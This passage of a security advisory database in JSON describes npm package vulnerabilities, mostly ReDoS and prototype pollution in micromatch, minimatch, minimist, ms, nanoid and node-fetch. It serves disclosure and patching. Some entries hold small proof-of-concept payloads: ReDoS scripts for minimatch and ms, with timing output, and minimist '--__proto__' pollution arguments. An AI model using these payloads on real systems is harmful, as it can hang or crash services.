to version 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in `micromatch.braces()` in `index.js` because the pattern `.*` will greedily match anything. By passing a malicious payload, the pattern matching will keep backtracking to the input while it doesn't find the closing bracket. As the input size increases, the consumption time will also increase until it causes the application to hang or slow down. 
There was a merged fix but further testing shows the issue persisted prior to https://github.com/micromatch/micromatch/pull/266. This issue should be mitigated by using a safe pattern that won't start backtracking the regular expression due to greedy matching.\n", "affected": [ { "package": { "name": "micromatch", "ecosystem": "npm", "purl": "pkg:npm/micromatch" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.0.8" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-952p-6rrq-rcjv/GHSA-952p-6rrq-rcjv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4067" }, { "type": "WEB", "url": "https://github.com/micromatch/micromatch/issues/243" }, { "type": "WEB", "url": "https://github.com/micromatch/micromatch/pull/247" }, { "type": "WEB", "url": "https://github.com/micromatch/micromatch/pull/266" }, { "type": "WEB", "url": "https://github.com/micromatch/micromatch/commit/03aa8052171e878897eee5d7bb2ae0ae83ec2ade" }, { "type": "WEB", "url": "https://github.com/micromatch/micromatch/commit/500d5d6f42f0e8dfa1cb5464c6cb420b1b6aaaa0" }, { "type": "WEB", "url": "https://advisory.checkmarx.net/advisory/CVE-2024-4067" }, { "type": "WEB", "url": "https://devhub.checkmarx.com/cve-details/CVE-2024-4067" }, { "type": "PACKAGE", "url": "https://github.com/micromatch/micromatch" }, { "type": "WEB", "url": "https://github.com/micromatch/micromatch/blob/2c56a8604b68c1099e7bc0f807ce0865a339747a/index.js#L448" }, { "type": "WEB", "url": "https://github.com/micromatch/micromatch/releases/tag/4.0.8" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2024-08-21T22:58:52Z", "nvd_published_at": "2024-05-14T15:42:47Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": 
"GHSA-wrvr-8mpx-r7pp", "published": "2018-07-20T16:20:52Z", "modified": "2023-11-08T03:59:07.102650Z", "aliases": [ "CVE-2017-16138" ], "summary": "mime Regular Expression Denial of Service when MIME lookup performed on untrusted user input", "details": "Affected versions of `mime` are vulnerable to regular expression denial of service when a mime lookup is performed on untrusted user input.\n\n\n## Recommendation\n\nUpdate to version 2.0.3 or later.", "affected": [ { "package": { "name": "mime", "ecosystem": "npm", "purl": "pkg:npm/mime" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/07/GHSA-wrvr-8mpx-r7pp/GHSA-wrvr-8mpx-r7pp.json" } }, { "package": { "name": "mime", "ecosystem": "npm", "purl": "pkg:npm/mime" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.4.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/07/GHSA-wrvr-8mpx-r7pp/GHSA-wrvr-8mpx-r7pp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16138" }, { "type": "WEB", "url": "https://github.com/broofa/node-mime/issues/167" }, { "type": "WEB", "url": "https://github.com/broofa/mime/commit/1df903fdeb9ae7eaa048795b8d580ce2c98f40b0" }, { "type": "WEB", "url": "https://github.com/broofa/mime/commit/855d0c4b8b22e4a80b9401a81f2872058eae274d" }, { "type": "PACKAGE", "url": "https://github.com/broofa/mime" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T22:01:10Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f8q6-p94x-37v3", "published": "2022-10-18T12:00:32Z", "modified": 
"2024-02-14T18:15:16Z", "aliases": [ "CVE-2022-3517" ], "summary": "minimatch ReDoS vulnerability", "details": "A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.", "affected": [ { "package": { "name": "minimatch", "ecosystem": "npm", "purl": "pkg:npm/minimatch" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.0.5" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-f8q6-p94x-37v3/GHSA-f8q6-p94x-37v3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3517" }, { "type": "WEB", "url": "https://github.com/grafana/grafana-image-renderer/issues/329" }, { "type": "WEB", "url": "https://github.com/nodejs/node/issues/42510" }, { "type": "WEB", "url": "https://github.com/isaacs/minimatch/commit/a8763f4388e51956be62dc6025cec1126beeb5e6" }, { "type": "PACKAGE", "url": "https://github.com/isaacs/minimatch" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00011.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MTEUUTNIEBHGKUKKLNUZSV7IEP6IP3Q3" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UM6XJ73Q3NAM5KSGCOKJ2ZIA6GUWUJLK" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2022-10-20T18:21:03Z", "nvd_published_at": "2022-10-17T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hxm2-r34f-qmc5", "published": "2018-10-09T00:40:41Z", "modified": "2023-11-08T03:58:11.455886Z", "aliases": [ 
"CVE-2016-10540" ], "summary": "Regular Expression Denial of Service in minimatch", "details": "Affected versions of `minimatch` are vulnerable to regular expression denial of service attacks when user input is passed into the `pattern` argument of `minimatch(path, pattern)`.\n\n\n## Proof of Concept\n```js\nvar minimatch = require(“minimatch”);\n\n// utility function for generating long strings\nvar genstr = function (len, chr) {\n var result = “”;\n for (i=0; i\u003c=len; i++) {\n result = result + chr;\n }\n return result;\n}\n\nvar exploit = “[!” + genstr(1000000, “\\\\”) + “A”;\n\n// minimatch exploit.\nconsole.log(“starting minimatch”);\nminimatch(“foo”, exploit);\nconsole.log(“finishing minimatch”);\n```\n\n\n## Recommendation\n\nUpdate to version 3.0.2 or later.", "affected": [ { "package": { "name": "minimatch", "ecosystem": "npm", "purl": "pkg:npm/minimatch" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-hxm2-r34f-qmc5/GHSA-hxm2-r34f-qmc5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10540" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-hxm2-r34f-qmc5" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/118" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:41:28Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-vh95-rmgr-6w4m", "published": "2020-04-03T21:48:32Z", "modified": "2025-01-14T08:57:16.325412Z", "aliases": [ "CVE-2020-7598" ], "summary": "Prototype Pollution in minimist", "details": "Affected versions of `minimist` are vulnerable to prototype pollution. 
Arguments are not properly sanitized, allowing an attacker to modify the prototype of `Object`, causing the addition or modification of an existing property that will exist on all objects. \nParsing the argument `--__proto__.y=Polluted` adds a `y` property with value `Polluted` to all objects. The argument `--__proto__=Polluted` raises an uncaught error and crashes the application. \nThis is exploitable if attackers have control over the arguments being passed to `minimist`.\n\n\n## Recommendation\n\nUpgrade to versions 0.2.1, 1.2.3 or later.", "affected": [ { "package": { "name": "minimist", "ecosystem": "npm", "purl": "pkg:npm/minimist" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.2.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-vh95-rmgr-6w4m/GHSA-vh95-rmgr-6w4m.json" } }, { "package": { "name": "minimist", "ecosystem": "npm", "purl": "pkg:npm/minimist" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.0.0" }, { "fixed": "1.2.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-vh95-rmgr-6w4m/GHSA-vh95-rmgr-6w4m.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7598" }, { "type": "WEB", "url": "https://github.com/minimistjs/minimist/commit/10bd4cdf49d9686d48214be9d579a9cdfda37c68" }, { "type": "WEB", "url": "https://github.com/minimistjs/minimist/commit/38a4d1caead72ef99e824bb420a2528eec03d9ab" }, { "type": "WEB", "url": "https://github.com/minimistjs/minimist/commit/4cf1354839cb972e38496d35e12f806eea92c11f#diff-a1e0ee62c91705696ddb71aa30ad4f95" }, { "type": "WEB", "url": "https://github.com/minimistjs/minimist/commit/63e7ed05aa4b1889ec2f3b196426db4500cbda94" }, { "type": "PACKAGE", "url": "https://github.com/substack/minimist" }, { "type": "WEB", "url": 
"https://snyk.io/vuln/SNYK-JS-MINIMIST-559764" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/1179" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00024.html" } ], "database_specific": { "cwe_ids": [ "CWE-1321" ], "github_reviewed": true, "github_reviewed_at": "2020-04-03T21:42:08Z", "nvd_published_at": "2020-03-11T23:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xvch-5gv4-984h", "published": "2022-03-18T00:01:09Z", "modified": "2025-01-14T10:12:15.693708Z", "aliases": [ "CVE-2021-44906" ], "summary": "Prototype Pollution in minimist", "details": "Minimist prior to 1.2.6 and 0.2.4 is vulnerable to Prototype Pollution via file `index.js`, function `setKey()` (lines 69-95).", "affected": [ { "package": { "name": "minimist", "ecosystem": "npm", "purl": "pkg:npm/minimist" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.0.0" }, { "fixed": "1.2.6" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-xvch-5gv4-984h/GHSA-xvch-5gv4-984h.json" } }, { "package": { "name": "minimist", "ecosystem": "npm", "purl": "pkg:npm/minimist" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.2.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-xvch-5gv4-984h/GHSA-xvch-5gv4-984h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44906" }, { "type": "WEB", "url": "https://github.com/minimistjs/minimist/issues/11" }, { "type": "WEB", "url": "https://github.com/substack/minimist/issues/164" }, { "type": "WEB", "url": "https://github.com/minimistjs/minimist/pull/24" }, { "type": "WEB", "url": 
"https://github.com/minimistjs/minimist/commit/34e20b8461118608703d6485326abbb8e35e1703" }, { "type": "WEB", "url": "https://github.com/minimistjs/minimist/commit/bc8ecee43875261f4f17eb20b1243d3ed15e70eb" }, { "type": "WEB", "url": "https://github.com/minimistjs/minimist/commit/c2b981977fa834b223b408cfb860f933c9811e4d" }, { "type": "WEB", "url": "https://github.com/minimistjs/minimist/commit/ef9153fc52b6cea0744b2239921c5dcae4697f11" }, { "type": "WEB", "url": "https://github.com/Marynk/JavaScript-vulnerability-detection/blob/main/minimist%20PoC.zip" }, { "type": "WEB", "url": "https://github.com/minimistjs/minimist/commits/v0.2.4" }, { "type": "PACKAGE", "url": "https://github.com/substack/minimist" }, { "type": "WEB", "url": "https://github.com/substack/minimist/blob/master/index.js#L69" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0006" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-MINIMIST-559764" }, { "type": "WEB", "url": "https://stackoverflow.com/questions/8588563/adding-custom-properties-to-a-function/20278068#20278068" } ], "database_specific": { "cwe_ids": [ "CWE-1321" ], "github_reviewed": true, "github_reviewed_at": "2022-03-18T23:13:40Z", "nvd_published_at": "2022-03-17T16:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3fx5-fwvr-xrjg", "published": "2017-10-24T18:33:36Z", "modified": "2024-08-01T16:44:35Z", "aliases": [ "CVE-2015-8315" ], "summary": "Regular Expression Denial of Service in ms", "details": "Versions of `ms` prior to 0.7.1 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.\n\n## Proof of Concept\n```javascript\nvar ms = require('ms');\nvar genstr = function (len, chr) {\n var result = \"\";\n for (i=0; i\u003c=len; i++) {\n result = result + chr;\n }\n\n return result;\n}\n\nms(genstr(process.argv[2], 
\"5\") + \" minutea\");\n\n```\n\n### Results\nShowing increase in execution time based on the input string.\n```\n$ time node ms.js 10000\n\nreal\t0m0.758s\nuser\t0m0.724s\nsys\t0m0.031s\n\n$ time node ms.js 20000\n\nreal\t0m2.580s\nuser\t0m2.494s\nsys\t0m0.047s\n\n$ time node ms.js 30000\n\nreal\t0m5.747s\nuser\t0m5.483s\nsys\t0m0.080s\n\n$ time node ms.js 80000\n\nreal\t0m41.022s\nuser\t0m38.894s\nsys\t0m0.529s\n```\n", "affected": [ { "package": { "name": "ms", "ecosystem": "npm", "purl": "pkg:npm/ms" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.7.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2017/10/GHSA-3fx5-fwvr-xrjg/GHSA-3fx5-fwvr-xrjg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-8315" }, { "type": "WEB", "url": "https://github.com/unshiftio/millisecond" }, { "type": "WEB", "url": "https://nodesecurity.io/advisories/46" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K46337613?utm_source=f5support\u0026amp%3Butm_medium=RSS" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K46337613?utm_source=f5support\u0026amp;utm_medium=RSS" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227190911/http://www.securityfocus.com/bid/96389" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2016/04/20/11" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/96389" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:55:05Z", "nvd_published_at": "2017-01-23T21:59:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-w9mr-4mfr-499f", "published": "2023-01-05T12:30:27Z", "modified": "2025-11-04T16:42:14Z", "aliases": [ "CVE-2017-20162" ], "summary": 
"Vercel ms Inefficient Regular Expression Complexity vulnerability", "details": "A vulnerability, which was classified as problematic, has been found in vercel ms up to 1.x. This issue affects the function parse of the file index.js. The manipulation of the argument str leads to inefficient regular expression complexity. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 2.0.0 is able to address this issue. The name of the patch is caae2988ba2a37765d055c4eee63d383320ee662. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217451.", "affected": [ { "package": { "name": "ms", "ecosystem": "npm", "purl": "pkg:npm/ms" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-w9mr-4mfr-499f/GHSA-w9mr-4mfr-499f.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-20162" }, { "type": "WEB", "url": "https://github.com/vercel/ms/pull/89" }, { "type": "WEB", "url": "https://github.com/vercel/ms/commit/caae2988ba2a37765d055c4eee63d383320ee662" }, { "type": "PACKAGE", "url": "https://github.com/vercel/ms" }, { "type": "WEB", "url": "https://github.com/vercel/ms/releases/tag/2.0.0" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241108-0002" }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.217451" }, { "type": "WEB", "url": "https://vuldb.com/?id.217451" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2023-01-10T21:45:33Z", "nvd_published_at": "2023-01-05T12:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mwcw-c2x4-8c55", "published": 
"2024-12-09T03:30:59Z", "modified": "2025-11-04T16:54:54Z", "aliases": [ "CVE-2024-55565" ], "related": [ "CGA-7vvh-vj96-x4xv", "CGA-8vh7-wwpf-5f4g", "CGA-cr3m-qfmj-rhf8", "CGA-q99g-63m8-c4r8" ], "summary": "Predictable results in nanoid generation when given non-integer values", "details": "When nanoid is called with a fractional value, there were a number of undesirable effects:\n\n1. in browser and non-secure, the code infinite loops on while (size--)\n2. in node, the value of poolOffset becomes fractional, causing calls to nanoid to return zeroes until the pool is next filled\n3. if the first call in node is a fractional argument, the initial buffer allocation fails with an error\n\nVersion 3.3.8 and 5.0.9 are fixed.", "affected": [ { "package": { "name": "nanoid", "ecosystem": "npm", "purl": "pkg:npm/nanoid" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "fixed": "5.0.9" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-mwcw-c2x4-8c55/GHSA-mwcw-c2x4-8c55.json" } }, { "package": { "name": "nanoid", "ecosystem": "npm", "purl": "pkg:npm/nanoid" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.3.8" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-mwcw-c2x4-8c55/GHSA-mwcw-c2x4-8c55.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-55565" }, { "type": "WEB", "url": "https://github.com/ai/nanoid/pull/510" }, { "type": "PACKAGE", "url": "https://github.com/ai/nanoid" }, { "type": "WEB", "url": "https://github.com/ai/nanoid/compare/3.3.7...3.3.8" }, { "type": "WEB", "url": "https://github.com/ai/nanoid/releases/tag/5.0.9" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00025.html" }, { "type": "WEB", "url": 
"https://lists.debian.org/debian-lts-announce/2025/01/msg00006.html" } ], "database_specific": { "cwe_ids": [ "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2024-12-09T22:42:43Z", "nvd_published_at": "2024-12-09T02:15:19Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qrpm-p2h7-hrv2", "published": "2022-01-21T23:57:06Z", "modified": "2025-11-04T16:35:00Z", "aliases": [ "CVE-2021-23566" ], "summary": "Exposure of Sensitive Information to an Unauthorized Actor in nanoid", "details": "The package nanoid from 3.0.0, before 3.1.31, are vulnerable to Information Exposure via the valueOf() function which allows to reproduce the last id generated.", "affected": [ { "package": { "name": "nanoid", "ecosystem": "npm", "purl": "pkg:npm/nanoid" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.1.31" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-qrpm-p2h7-hrv2/GHSA-qrpm-p2h7-hrv2.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23566" }, { "type": "WEB", "url": "https://github.com/ai/nanoid/pull/328" }, { "type": "WEB", "url": "https://github.com/ai/nanoid/commit/2b7bd9332bc49b6330c7ddb08e5c661833db2575" }, { "type": "WEB", "url": "https://gist.github.com/artalar/bc6d1eb9a3477d15d2772e876169a444" }, { "type": "PACKAGE", "url": "https://github.com/ai/nanoid" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00025.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00006.html" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2332550" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-NANOID-2332193" } ], "database_specific": { "cwe_ids": [ "CWE-200", "CWE-704" ], 
"github_reviewed": true, "github_reviewed_at": "2022-01-18T21:54:04Z", "nvd_published_at": "2022-01-14T20:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-ff6r-5jwm-8292", "published": "2018-07-24T19:51:16Z", "modified": "2023-11-08T03:59:04.794346Z", "aliases": [ "CVE-2017-16099" ], "summary": "Regular Expression Denial of Service in no-case", "details": "Affected versions of `no-case` are vulnerable to a regular expression denial of service when parsing untrusted user input.\n\n\n## Recommendation\n\nUpdate to version 2.3.2 or later.", "affected": [ { "package": { "name": "no-case", "ecosystem": "npm", "purl": "pkg:npm/no-case" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.3.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/07/GHSA-ff6r-5jwm-8292/GHSA-ff6r-5jwm-8292.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16099" }, { "type": "WEB", "url": "https://github.com/blakeembrey/no-case/issues/17" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-ff6r-5jwm-8292" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/529" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:34:26Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r683-j2x4-v87g", "published": "2022-01-21T23:55:52Z", "modified": "2023-11-08T04:07:30.211593Z", "aliases": [ "CVE-2022-0235" ], "summary": "node-fetch forwards secure headers to untrusted sites", "details": "node-fetch forwards secure headers such as `authorization`, `www-authenticate`, `cookie`, \u0026 `cookie2` when 
redirecting to an untrusted site.", "affected": [ { "package": { "name": "node-fetch", "ecosystem": "npm", "purl": "pkg:npm/node-fetch" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.1.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-r683-j2x4-v87g/GHSA-r683-j2x4-v87g.json" } }, { "package": { "name": "node-fetch", "ecosystem": "npm", "purl": "pkg:npm/node-fetch" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.6.7" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-r683-j2x4-v87g/GHSA-r683-j2x4-v87g.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-0235" }, { "type": "WEB", "url": "https://github.com/node-fetch/node-fetch/pull/1449/commits/5c32f002fdd65b1c6a8f1e3620210813d45c7e60" }, { "type": "WEB", "url": "https://github.com/node-fetch/node-fetch/pull/1453" }, { "type": "WEB", "url": "https://github.com/node-fetch/node-fetch/commit/1ef4b560a17e644a02a3bfdea7631ffeee578b35" }, { "type": "WEB", "url": "https://github.com/node-fetch/node-fetch/commit/36e47e8a6406185921e4985dcbeff140d73eaa10" }, { "type": "WEB", "url": "https://github.com/node-fetch/node-fetch/commit/5c32f002fdd65b1c6a8f1e3620210813d45c7e60" }, { "type": "WEB", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf" }, { "type": "PACKAGE", "url": "https://github.com/node-fetch/node-fetch" }, { "type": "WEB", "url": "https://huntr.dev/bounties/d26ab655-38d6-48b3-be15-f9ad6b6ae6f7" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00007.html" } ], "database_specific": { "cwe_ids": [ "CWE-173", "CWE-200", "CWE-601" ], "github_reviewed": true, "github_reviewed_at": "2022-01-18T22:51:22Z", "nvd_published_at": "2022-01-16T17:15:00Z", "severity": "HIGH" }, 
"severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-vp56-6g26-6827", "published": "2022-08-02T00:00:25Z", "modified": "2023-11-08T04:08:52.815695Z", "aliases": [ "CVE-2022-2596" ], "summary": "node-fetch Inefficient Regular Expression Complexity ", "details": "[node-fetch](https://www.npmjs.com/package/node-fetch) is a light-weight module that brings window.fetch to node.js.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in the `isOriginPotentiallyTrustworthy()` function in `referrer.js`, when processing a URL string with alternating letters and periods, such as `'http://' + 'a.a.'.repeat(i) + 'a'`.", "affected": [ { "package": { "name": "node-fetch", "ecosystem": "npm", "purl": "pkg:npm/node-fetch" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.2.10" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-vp56-6g26-6827/GHSA-vp56-6g26-6827.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-2596" }, { "type": "WEB", "url": "https://github.com/node-fetch/node-fetch/pull/1611" }, { "type": "WEB", "url": "https://github.com/node-fetch/node-fetch/commit/28802387292baee467e042e168d92597b5bbbe3d" }, { "type": "PACKAGE", "url": "https://github.com/node-fetch/node-fetch" }, { "type": "WEB", "url": "https://github.com/node-fetch/node-fetch/releases/tag/v3.2.10" }, { "type": "WEB", "url": "https://huntr.dev/bounties/a7e6a136-0a4b-46c4-ad20-802f1dd60bf7" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2022-08-04T17:37:24Z", "nvd_published_at": "2022-08-01T15:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { 
"schema_version": "1.7.3", "id": "GHSA-w7rc-rwvf-8q5r", "published": "2020-09-10T17:46:21Z", "modified": "2024-07-15T19:46:22Z", "aliases": [ "CVE-2020-15168" ], "related": [ "CVE-2020-15168" ], "summary": "The `size` option isn't honored after following a redirect in node-fetch", "details": "### Impact\nNode Fetch did not honor the `size` option after following a redirect, which means that when a content size was over the limit, a `FetchError` would never get thrown and the process would end without failure.\n\nFor most people, this fix will have a little or no impact. However, if you are relying on node-fetch to gate files above a size, the impact could be significant, for example: If you don't double-check the size of the data after `fetch()` has completed, your JS thread could get tied up doing work on a large file (DoS) and/or cost you money in computing.\n\n### Patches\nWe released patched versions for both stable and beta channels:\n\n- For `v2`: 2.6.1\n- For `v3`: 3.0.0-beta.9\n\n### Workarounds\nNone, it is strongly recommended to update as soon as possible.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [node-fetch](https://github.com/node-fetch/node-fetch/issues/new?assignees=\u0026labels=question\u0026template=support-or-usage.md\u0026title=Question%3A+)\n* Contact one of the core maintainers.", "affected": [ { "package": { "name": "node-fetch", "ecosystem": "npm", "purl": "pkg:npm/node-fetch" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.1" } ] } ], "database_specific": { "source": 